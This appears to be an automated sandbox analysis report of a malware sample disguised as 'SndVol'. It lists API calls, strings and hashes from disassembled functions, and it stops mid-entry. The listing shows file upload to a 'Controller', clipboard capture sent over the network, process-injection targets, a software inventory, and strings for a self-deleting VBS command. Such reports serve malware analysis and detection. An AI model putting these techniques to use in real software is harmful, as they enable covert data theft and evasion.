                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                • API String ID: 2490988753-744132762
                                                                • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                                                • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                                                • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnumOpen
                                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                • API String ID: 1332880857-3714951968
                                                                • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                                • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                                                • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                                • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                                                APIs
                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                                • GetCursorPos.USER32(?), ref: 0041D5E9
                                                                • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                                • ExitProcess.KERNEL32 ref: 0041D665
                                                                • CreatePopupMenu.USER32 ref: 0041D66B
                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                • String ID: Close
                                                                • API String ID: 1657328048-3535843008
                                                                • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                                • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$Info
                                                                • String ID:
                                                                • API String ID: 2509303402-0
                                                                • Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                                • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                                                • Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                                • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                                • _free.LIBCMT ref: 004512FF
                                                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                • _free.LIBCMT ref: 00451321
                                                                • _free.LIBCMT ref: 00451336
                                                                • _free.LIBCMT ref: 00451341
                                                                • _free.LIBCMT ref: 00451363
                                                                • _free.LIBCMT ref: 00451376
                                                                • _free.LIBCMT ref: 00451384
                                                                • _free.LIBCMT ref: 0045138F
                                                                • _free.LIBCMT ref: 004513C7
                                                                • _free.LIBCMT ref: 004513CE
                                                                • _free.LIBCMT ref: 004513EB
                                                                • _free.LIBCMT ref: 00451403
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                                • __aulldiv.LIBCMT ref: 00408D4D
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                                • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                                                • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                • API String ID: 3086580692-2596673759
                                                                • Opcode ID: 83544a841d733fb685d9403c845306c33a91344e28fc051850798e968e587a75
                                                                • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                                                • Opcode Fuzzy Hash: 83544a841d733fb685d9403c845306c33a91344e28fc051850798e968e587a75
                                                                • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                                • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                                APIs
                                                                  • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                                                • GetLastError.KERNEL32 ref: 00455CEF
                                                                • __dosmaperr.LIBCMT ref: 00455CF6
                                                                • GetFileType.KERNEL32(00000000), ref: 00455D02
                                                                • GetLastError.KERNEL32 ref: 00455D0C
                                                                • __dosmaperr.LIBCMT ref: 00455D15
                                                                • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                                • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                                • GetLastError.KERNEL32 ref: 00455EB1
                                                                • __dosmaperr.LIBCMT ref: 00455EB8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                • String ID: H
                                                                • API String ID: 4237864984-2852464175
                                                                • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                                • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                                APIs
                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                                                • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                                                • __alloca_probe_16.LIBCMT ref: 00453F94
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                                                • __freea.LIBCMT ref: 00454003
                                                                • __freea.LIBCMT ref: 0045400F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                • String ID: \@E
                                                                • API String ID: 201697637-1814623452
                                                                • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                                                • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                                • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                                                • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                • API String ID: 3756808967-1743721670
                                                                • Opcode ID: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
                                                                • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                                • Opcode Fuzzy Hash: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
                                                                • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: \&G$\&G$`&G
                                                                • API String ID: 269201875-253610517
                                                                • Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                                                • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                                • Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                                                • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: \&G$\&G$`&G
                                                                • API String ID: 269201875-253610517
                                                                • Opcode ID: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
                                                                • Instruction ID: 4b878a3e8ef23272bf5689ace776797b76f95236748e951a07d057736f31deb0
                                                                • Opcode Fuzzy Hash: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
                                                                • Instruction Fuzzy Hash: DE61D3B2E04205AFDF21DF68C841BAEBBFAFF45720F144169E954EB291E7709941CB90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 65535$udp
                                                                • API String ID: 0-1267037602
                                                                • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                                • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                                APIs
                                                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                  • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                                                  • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                                                  • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                                • ExitProcess.KERNEL32 ref: 0040D9C4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                • API String ID: 1913171305-2411266221
                                                                • Opcode ID: 7c0be83f1035b6f98a22b21250c75de82ef56e94692df2942c9a087d203d9b6d
                                                                • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                                • Opcode Fuzzy Hash: 7c0be83f1035b6f98a22b21250c75de82ef56e94692df2942c9a087d203d9b6d
                                                                • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 0536760E
                                                                • EmptyClipboard.USER32 ref: 0536761C
                                                                • CloseClipboard.USER32 ref: 05367622
                                                                • OpenClipboard.USER32 ref: 05367629
                                                                • GetClipboardData.USER32(0000000D), ref: 05367639
                                                                • GlobalFix.KERNEL32(00000000), ref: 05367642
                                                                • GlobalUnWire.KERNEL32(00000000), ref: 0536764B
                                                                • CloseClipboard.USER32 ref: 05367651
                                                                  • Part of subcall function 0535576E: send.WS2_32(?,00000000,00000000,00000000), ref: 05355803
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyWiresend
                                                                • String ID: !D@$hdF
                                                                • API String ID: 653963949-3475379602
                                                                • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                                                • Instruction ID: cfa40c64c1ece5bd8b5110bdb39781cd44da34eebfcc1327bf885c46611a849d
                                                                • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                                                • Instruction Fuzzy Hash: 53014831304300DFD724AB71EC5CAAE77A9AF98652F40987DBC07C21A2EF258C05CA69
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                                • __dosmaperr.LIBCMT ref: 0043A8A6
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                                • __dosmaperr.LIBCMT ref: 0043A8E3
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                                • __dosmaperr.LIBCMT ref: 0043A937
                                                                • _free.LIBCMT ref: 0043A943
                                                                • _free.LIBCMT ref: 0043A94A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                • String ID:
                                                                • API String ID: 2441525078-0
                                                                • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                                                • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                                • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                                                • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,05352A22,?,00000050,00465E00,00000000), ref: 0538B55F
                                                                • GetLastError.KERNEL32(?,?,05352A22,?,00000050,00465E00,00000000), ref: 0538B56C
                                                                • __dosmaperr.LIBCMT ref: 0538B573
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,05352A22,?,00000050,00465E00,00000000), ref: 0538B59F
                                                                • GetLastError.KERNEL32(?,?,?,05352A22,?,00000050,00465E00,00000000), ref: 0538B5A9
                                                                • __dosmaperr.LIBCMT ref: 0538B5B0
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,00465E00,00000000,00000000,?,?,?,?,?,?,05352A22,?), ref: 0538B5F3
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,05352A22,?,00000050,00465E00,00000000), ref: 0538B5FD
                                                                • __dosmaperr.LIBCMT ref: 0538B604
                                                                • _free.LIBCMT ref: 0538B610
                                                                • _free.LIBCMT ref: 0538B617
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                • String ID:
                                                                • API String ID: 2441525078-0
                                                                • Opcode ID: 349d6e8f71b3306115ff94c1c71847e27514464045ba0744507fb65a98dea562
                                                                • Instruction ID: 7cbca1532b85c064a161919fade8417ce5ac87ec17904b416a4eecda6181bcc2
                                                                • Opcode Fuzzy Hash: 349d6e8f71b3306115ff94c1c71847e27514464045ba0744507fb65a98dea562
                                                                • Instruction Fuzzy Hash: AB316DB290430BFBDF19AFA5CC589BFBB69EF05220B140269F950A61A0DB31C951DB60
                                                                APIs
                                                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                • TranslateMessage.USER32(?), ref: 0040557E
                                                                • DispatchMessageA.USER32(?), ref: 00405589
                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
